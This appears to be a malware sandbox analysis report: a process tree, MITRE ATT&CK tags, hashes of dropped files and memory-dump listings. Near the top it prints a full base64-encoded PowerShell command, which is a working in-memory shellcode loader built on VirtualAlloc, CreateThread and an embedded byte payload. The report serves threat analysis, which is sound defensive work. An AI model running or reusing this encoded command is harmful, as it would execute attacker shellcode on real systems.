- Suspicious use of WriteProcessMemory
PID:1200

C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" -enc JABQAHkARwAgAD0AIAAnAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAVgBpAHIAdAB1AGEAbABBAGwAbABvAGMAKABJAG4AdABQAHQAcgAgAGwAcABBAGQAZAByAGUAcwBzACwAIAB1AGkAbgB0ACAAZAB3AFMAaQB6AGUALAAgAHUAaQBuAHQAIABmAGwAQQBsAGwAbwBjAGEAdABpAG8AbgBUAHkAcABlACwAIAB1AGkAbgB0ACAAZgBsAFAAcgBvAHQAZQBjAHQAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAQwByAGUAYQB0AGUAVABoAHIAZQBhAGQAKABJAG4AdABQAHQAcgAgAGwAcABUAGgAcgBlAGEAZABBAHQAdAByAGkAYgB1AHQAZQBzACwAIAB1AGkAbgB0ACAAZAB3AFMAdABhAGMAawBTAGkAegBlACwAIABJAG4AdABQAHQAcgAgAGwAcABTAHQAYQByAHQAQQBkAGQAcgBlAHMAcwAsACAASQBuAHQAUAB0AHIAIABsAHAAUABhAHIAYQBtAGUAdABlAHIALAAgAHUAaQBuAHQAIABkAHcAQwByAGUAYQB0AGkAbwBuAEYAbABhAGcAcwAsACAASQBuAHQAUAB0AHIAIABsAHAAVABoAHIAZQBhAGQASQBkACkAOwBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBtAHMAdgBjAHIAdAAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAbQBlAG0AcwBlAHQAKABJAG4AdABQAHQAcgAgAGQAZQBzAHQALAAgAHUAaQBuAHQAIABzAHIAYwAsACAAdQBpAG4AdAAgAGMAbwB1AG4AdAApADsAJwA7ACQAdwAgAD0AIABBAGQAZAAtAFQAeQBwAGUAIAAtAG0AZQBtAGIAZQByAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAFAAeQBHACAALQBOAGEAbQBlACAAIgBXAGkAbgAzADIAIgAgAC0AbgBhAG0AZQBzAHAAYQBjAGUAIABXAGkAbgAzADIARgB1AG4AYwB0AGkAbwBuAHMAIAAtAHAAYQBzAHMAdABoAHIAdQA7AFsAQgB5AHQAZQBbAF0AXQA7AFsAQgB5AHQAZQBbAF0AXQAkAHoAIAA9ACAAMAB4AGQAYQAsADAAeABjADUALAAwAHgAYgBhACwAMAB4ADQAOAAsADAAeABkADEALAAwAHgAZgBmACwAMAB4ADkANgAsADAAeABkADkALAAwAHgANwA0ACwAMAB4ADIANAAsADAAeABmADQALAAwAHgANQBlACwAMAB4ADIAYgAsADAAeABjADkALAAwAHgAYgAxACwAMAB4ADQAYgAsADAAeAAzADEALAAwAHgANQA2ACwAMAB4ADEANwAsADAAeAA4ADMALAAwAHgAZQBlACwAMAB4AGYAYwAsADAAeAAwADMALAAwAHgAMQBlACwAMAB4AGMAMgAsADAAeAAxAGQALAAwAHgANgAzACwAMAB4ADYAMgAsADAAeAAwAGMALAAwAHgANgBlACwAMAB4ADgAYwAsADAAeAA5AGEALAAwAHgAYwBkACwAMAB4ADEAMQAsADAAeAAwADQALAAwAHgANwBmACwAMAB4AGYAYwAsADAAeAAwADMALAAwAHgANwAyACwAMAB4AGYANAAsADAAeABhAGQALAAwAHgAOQAzACwAMAB4AGYAMAAsADAAeAA1ADgALAAwAHgANQBlACwAMAB4ADUAZgAsADAAeAA1ADQALAAwAHgANAA4ACwAMAB4AGQANQAsADAAeAAyAGQALAAwAHgANwAxACwAMAB4ADQAMQAsADAAeAAxADYALAAwAHgAZABlACwAMAB4ADMANgAsADAAeABlAGIALAAwAHgAYwBlACwAMAB4AGQAMAAsADAAeABmADgALAAwAHgANAA3ACwAMAB4ADMAMgAsADAAeAA3ADIALAAwAHgAOAA1ACwAMAB4ADkANQAsADAAeAA2ADcALAAwAHgANQA0ACwAMAB4AGIANAAsADAAeAA1ADYALAAwAHgANwBhACwAMAB4ADkANQAsADAAeABmADEALAAwAHgAMgAxACwAMAB4AGYAMAAsADAAeAA3AGEALAAwAHgAYQBmACwAMAB4ADMAYQAsADAAeABhADgALAAwAHgAOQA0ACwAMAB4ADAANwAsADAAeABiADcALAAwAHgAMABmACwAMAB4AGEAOQAsADAAeABhADYALAAwAHgAMQA3ACwAMAB4ADAANAAsADAAeAA5ADEALAAwAHgAZAAwACwAMAB4ADEAMgAsADAAeABkAGIALAAwAHgANgA2ACwAMAB4ADYAZAAsADAAeAAxAGQALAAwAHgAMABjACwAMAB4ADAAZAAsADAAeAAzADUALAAwAHgAMwBkACwAMAB4AGEAZAAsADAAeABjADEALAAwAHgANABkACwAMAB4ADcANQAsADAAeABiADUALAAwAHgAYgA1ACwAMAB4AGQANAAsADAAeAA0AGMALAAwAHgAYgAxACwAMAB4ADAAOQAsADAAeAA5AGUALAAwAHgANwBmACwAMAB4AGMANQAsADAAeABmADkALAAwAHgAMQA0ACwAMAB4AGYANAAsADAAeAAzADgALAAwAHgAMgA4ACwAMAB4ADYANQAsADAAeABjAGEALAAwAHgAZgBhACwAMAB4ADEAYgAsADAAeAA4AGIALAAwAHgANgA2ACwAMAB4AGYAZAAsADAAeAA2ADQALAAwAHgAYQBjACwAMAB4ADkANgAsADAAeAA4AGIALAAwAHgAOQBlACwAMAB4AGMAZQAsADAAeAAyAGIALAAwAHgAOABjACwAMAB4ADYANAAsADAAeABhAGMALAAwAHgAZgA3ACwAMAB4ADEAOQAsADAAeAA3AGIALAAwAHgAMQA2ACwAMAB4ADcAYwAsADAAeABiADkALAAwAHgANQBmACwAMAB4AGEANgAsADAAeAA1ADEALAAwAHgANQBjACwAMAB4ADIAYgAsADAAeABhADQALAAwAHgAMQBlACwAMAB4ADIAYQAsADAAeAA3ADMALAAwAHgAYQA5ACwAMAB4AGEAMQAsADAAeABmAGYALAAwAHgAMABmACwAMAB4AGQANQAsADAAeAAyAGEALAAwAHgAZgBlACwAMAB4AGQAZgAsADAAeAA1AGYALAAwAHgANgA4ACwAMAB4ADIANQAsADAAeABjADQALAAwAHgAMAA0ACwAMAB4ADIAYgAsADAAeAA0ADQALAAwAHgANQBkACwAMAB4AGUAMQAsADAAeAA5AGEALAAwAHgANwA5ACwAMAB4AGIAZAAsADAAeAA0AGQALAAwAHgANAAzACwAMAB4AGQAYwAsADAAeABiADUALAAwAHgANwBjACwAMAB4ADkAMgAsADAAeAA2ADAALAAwAHgAMwA2ACwAMAB4ADcAZgAsADAAeAA5AGIALAAwAHgAMwBjACwAMAB4AGEAMQAsADAAeABiADMALAAwAHgANQAxACwAMAB4AGIAZgAsADAAeAAzADEALAAwAHgAZABjACwAMAB4AGUAMgAsADAAeABjAGMALAAwAHgAMAAzACwAMAB4ADQAMwAsADAAeAA1ADgALAAwAHgANQBiACwAMAB4ADIAOAAsADAAeAAwAGMALAAwAHgANAA2ACwAMAB4ADkAYwAsADAAeAAzADkALAAwAHgAMQBhACwAMAB4ADcAOQAsADAAeAA3ADIALAAwAHgAOAAxACwAMAB4ADQAYgAsADAAeAA4ADQALAAwAHgANwAzACwAMAB4AGYAMgAsADAAeAA0ADIALAAwAHgANAAyACwAMAB4ADIANwAsADAAeABhADIALAAwAHgAZgBjACwAMAB4ADYAMwAsADAAeAA0ADgALAAwAHgAMgA5ACwAMAB4AGYAZAAsADAAeAA4AGMALAAwAHgAOQBkACwAMAB4AGMANAAsADAAeABmADcALAAwAHgAMQBhACwAMAB4AGQAZQAsADAAeABiADEALAAwAHgAMAA0ACwAMAB4ADUAYQAsADAAeABiADYALAAwAHgAYwAzACwAMAB4ADEANAAsADAAeAA0AGYALAAwAHgAZQBmACwAMAB4ADQAZAAsADAAeABmADIALAAwAHgAMwBmACwAMAB4AGIAZgAsADAAeAAxAGQALAAwAHgAYQBiACwAMAB4AGYAZgAsADAAeAA2AGYALAAwAHgAZABlACwAMAB4ADEAYgAsADAAeAA5ADcALAAwAHgANgA1ACwAMAB4AGQAMQAsADAAeAA0ADQALAAwAHgAOAA3ACwAMAB4ADgANQAsADAAeAAzAGIALAAwAHgAZQBkACwAMAB4ADIAZAAsADAAeAA2AGEALAAwAHgAOQAyACwAMAB4ADQANQAsADAAeABkADkALAAwAHgAMQAzACwAMAB4AGIAZgAsADAAeAAxAGUALAAwAHgANwA4ACwAMAB4AGQAYgAsADAAeAAxADUALAAwAHgANQBiACwAMAB4AGIAYQAsADAAeAA1ADcALAAwAHgAOQBhACwAMAB4ADkAYgAsADAAeAA3ADQALAAwAHgAOQAwACwAMAB4AGQANwAsADAAeAA4AGYALAAwAHgAZQAwACwAMAB4ADUAMAAsADAAeABhADIALAAwAHgAZgAyACwAMAB4AGEANgAsADAAeAA2AGYALAAwAHgAMQA4ACwAMAB4ADkAOAAsADAAeAA0ADYALAAwAHgAZgBhACwAMAB4AGEANwAsADAAeAAwAGIALAAwAHgAMQAxACwAMAB4ADkAMgAsADAAeABhADUALAAwAHgANgBhACwAMAB4ADUANQAsADAAeAAzAGQALAAwAHgANQA1ACwAMAB4ADUAOQAsADAAeABlAGUALAAwAHgAZgA0ACwAMAB4AGMAMwAsADAAeAAyADIALAAwAHgAOQA4ACwAMAB4AGYAOAAsADAAeAAwADMALAAwAHgAYQAzACwAMAB4ADUAOAAsADAAeABhAGYALAAwAHgANAA5ACwAMAB4AGEAMwAsADAAeAAzADAALAAwAHgAMQA3ACwAMAB4ADIAYQAsADAAeABmADAALAAwAHgAMgA1ACwAMAB4ADUAOAAsADAAeABlADcALAAwAHgANgA0ACwAMAB4AGYANgAsADAAeABjAGQALAAwAHgAMAA4ACwAMAB4AGQAZAAsADAAeABhAGIALAAwAHgANAA2ACwAMAB4ADYAMQAsADAAeABlADMALAAwAHgAOQAyACwAMAB4AGEAMQAsADAAeAAyAGUALAAwAHgAMQBjACwAMAB4AGYAMQAsADAAeAAzADMALAAwAHgAMQAyACwAMAB4AGMAYgAsADAAeAAzAGYALAAwAHgANAA2ACwAMAB4ADcAYQAsADAAeABjAGYAOwAkAGcAIAA9ACAAMAB4ADEAMAAwADAAOwBpAGYAIAAoACQAegAuAEwAZQBuAGcAdABoACAALQBnAHQAIAAwAHgAMQAwADAAMAApAHsAJABnACAAPQAgACQAegAuAEwAZQBuAGcAdABoAH0AOwAkAEgAbABwAFcAPQAkAHcAOgA6AFYAaQByAHQAdQBhAGwAQQBsAGwAbwBjACgAMAAsADAAeAAxADAAMAAwACwAJABnACwAMAB4ADQAMAApADsAZgBvAHIAIAAoACQAaQA9ADAAOwAkAGkAIAAtAGwAZQAgACgAJAB6AC4ATABlAG4AZwB0AGgALQAxACkAOwAkAGkAKwArACkAIAB7ACQAdwA6ADoAbQBlAG0AcwBlAHQAKABbAEkAbgB0AFAAdAByAF0AKAAkAEgAbABwAFcALgBUAG8ASQBuAHQAMwAyACgAKQArACQAaQApACwAIAAkAHoAWwAkAGkAXQAsACAAMQApAH0AOwAkAHcAOgA6AEMAcgBlAGEAdABlAFQAaAByAGUAYQBkACgAMAAsADAALAAkAEgAbABwAFcALAAwACwAMAAsADAAKQA7AGYAbwByACAAKAA7ADsAKQB7AFMAdABhAHIAdAAtAHMAbABlAGUAcAAgADYAMAB9ADsA
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:412

C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\0auwovug\0auwovug.cmdline"
5⤵
- Suspicious use of WriteProcessMemory
PID:3816

C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES2EEF.tmp" "c:\Users\Admin\AppData\Local\Temp\0auwovug\CSCEC0367F36A24A86B040C456BFD72E33.TMP"
6⤵
PID:2544

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\0auwovug\0auwovug.dll

Filesize
3KB

MD5
9e12494cebc3cc1e29926ca8a52502bf

SHA1
a9eed98c16dbfbcecbcbbc033c871d6a9047d055

SHA256
d3048c86290b9dd4980232dba89c29032fbdecae0536da76208f078f7e7fb57b

SHA512
d15e92fcd0872f6777231fbc297b9ccfff1fab2aba2e0575e5287e05562a68e19b130e24401a9312b6013c0e097e155b8d5c9b4c7b4e87a1db3f33d5d5445032

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES2EEF.tmp

Filesize
1KB

MD5
d999d700274a57355007e28437facd9c

SHA1
bb1c2dd29622dccd53f4e78618ed0747d03f54f0

SHA256
a585066197133c9f1fd50d15e942276209fe97d78696f839f469a357d5b4729c

SHA512
85492ea33b182c8fb62c1a18423549310ed8a50cf29f8d1e31e02fd93960912a8d289ff46ac9add9c692c0350ee4acb2fae605c6b4e960c8e65f91f488fb7d6f

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_4du5asn5.utp.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\0auwovug\0auwovug.0.cs

Filesize
557B

MD5
7319070c34daa5f6f2ece2dfc07119ee

SHA1
f26a4a48518a5608e93c8b77368f588b0433973c

SHA256
b240a9bb4f72d886522e19fa40b9c688fa94c1bd6dc7b7185f94e4466273a5dc

SHA512
34169fc9fb0cd2381c45efcd22ec1bc659ef513e73bc4c7bcb91ca1d5129a1a149e9f75297acb4958e52ff04d75e6e121232dbc0657611e41b63f10aa3e1d6bd

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\0auwovug\0auwovug.cmdline

Filesize
369B

MD5
039f1b7f7fa26e0d5c009eb361ec8adc

SHA1
b6dee295adaeb9f8936cc93cee5db9ad7a6704b1

SHA256
d9a240ea781ae160742ea23cc8ab8b97fc3f6f80efc57fe4590e72a2ea5be34a

SHA512
46fecf90754998c88cf53998f922343b453f015a8ee860314648d3bd89765eec568bddc7ab1437f4df3ca5a09ce7a589e942d35bbdca0d92d2453626476a4e25

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\0auwovug\CSCEC0367F36A24A86B040C456BFD72E33.TMP

Filesize
652B

MD5
a1bc6efd84b6fb01a31c1d58715bf3bb

SHA1
286cfe1a5f9fbcf8c66e0a75cdfac18f7a05921e

SHA256
fc05a451cdaa3f460fa0580384c37e0fa26dc684f4f8cb9c98d183294a64a530

SHA512
224c245d03bac594c7607b8757b666ffbb9bf1e9491b5d81fac5b8487a80d8a00ffefcdd989c5c346b78dd9016a2f36530312cacd4d0c11b85bdc9df2a5c10e5

Download Submit
memory/412-15-0x000000007504E000-0x000000007504F000-memory.dmp

Filesize
4KB

Download
memory/412-36-0x00000000066A0000-0x00000000066BA000-memory.dmp

Filesize
104KB

Download
memory/412-16-0x0000000004B40000-0x0000000004B76000-memory.dmp

Filesize
216KB

Download
memory/412-18-0x0000000075040000-0x00000000757F0000-memory.dmp

Filesize
7.7MB

Download
memory/412-17-0x00000000051C0000-0x00000000057E8000-memory.dmp

Filesize
6.2MB

Download
memory/412-19-0x0000000075040000-0x00000000757F0000-memory.dmp

Filesize
7.7MB

Download
memory/412-20-0x0000000005140000-0x0000000005162000-memory.dmp

Filesize
136KB

Download
memory/412-21-0x0000000005A20000-0x0000000005A86000-memory.dmp

Filesize
408KB

Download
memory/412-22-0x0000000005A90000-0x0000000005AF6000-memory.dmp

Filesize
408KB

Download
memory/412-32-0x0000000005DE0000-0x0000000006134000-memory.dmp

Filesize
3.3MB

Download
memory/412-33-0x0000000006180000-0x000000000619E000-memory.dmp

Filesize
120KB

Download
memory/412-34-0x00000000061C0000-0x000000000620C000-memory.dmp

Filesize
304KB

Download
memory/412-35-0x00000000077E0000-0x0000000007E5A000-memory.dmp

Filesize
6.5MB

Download
memory/412-56-0x0000000075040000-0x00000000757F0000-memory.dmp

Filesize
7.7MB

Download
memory/412-55-0x000000007504E000-0x000000007504F000-memory.dmp

Filesize
4KB

Download
memory/412-51-0x0000000007160000-0x0000000007161000-memory.dmp

Filesize
4KB

Download
memory/412-49-0x0000000006730000-0x0000000006738000-memory.dmp

Filesize
32KB

Download
memory/1200-11-0x000001689EFB0000-0x000001689EFD2000-memory.dmp

Filesize
136KB

Download
memory/1200-12-0x00007FFC74860000-0x00007FFC75321000-memory.dmp

Filesize
10.8MB

Download
memory/1200-13-0x00007FFC74860000-0x00007FFC75321000-memory.dmp

Filesize
10.8MB

Download
memory/1200-52-0x00007FFC74860000-0x00007FFC75321000-memory.dmp

Filesize
10.8MB

Download
memory/1200-54-0x00007FFC74860000-0x00007FFC75321000-memory.dmp

Filesize
10.8MB

Download
memory/1200-14-0x00007FFC74860000-0x00007FFC75321000-memory.dmp

Filesize
10.8MB

Download
memory/4888-1-0x00007FFC74863000-0x00007FFC74865000-memory.dmp

Filesize
8KB

Download
memory/4888-0-0x0000000000280000-0x000000000028A000-memory.dmp

Filesize
40KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads